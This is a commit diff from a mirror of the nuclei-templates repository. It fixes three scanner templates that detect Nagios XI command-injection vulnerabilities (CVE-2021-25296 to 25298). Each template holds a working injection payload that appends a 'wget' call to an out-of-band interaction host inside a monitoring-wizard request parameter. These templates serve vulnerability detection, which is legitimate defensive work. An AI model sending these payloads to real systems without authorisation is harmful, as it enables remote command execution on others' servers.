daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

URL encode semicolon, add closing quote for cve-2021-25297

patch-1
Matthew Dunn 2023-02-22 15:51:51 -05:00
parent 5a114fb68a
commit 54ea0c5f89
3 changed files with 4 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
cves/2021/CVE-2021-25296.yaml
View File

@ -25,6 +25,7 @@ requests:
- |
GET /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
@ -37,7 +38,7 @@ requests:
Host: {{Hostname}}
- |
GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}; HTTP/1.1
GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true

3
cves/2021/CVE-2021-25297.yaml
View File

@ -38,8 +38,7 @@ requests:
Host: {{Hostname}}
- |
@timeout: 20s
GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}};&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1
GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true

3
cves/2021/CVE-2021-25298.yaml
View File

@ -38,8 +38,7 @@ requests:
Host: {{Hostname}}
- |
@timeout: 20s
GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}; HTTP/1.1
GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true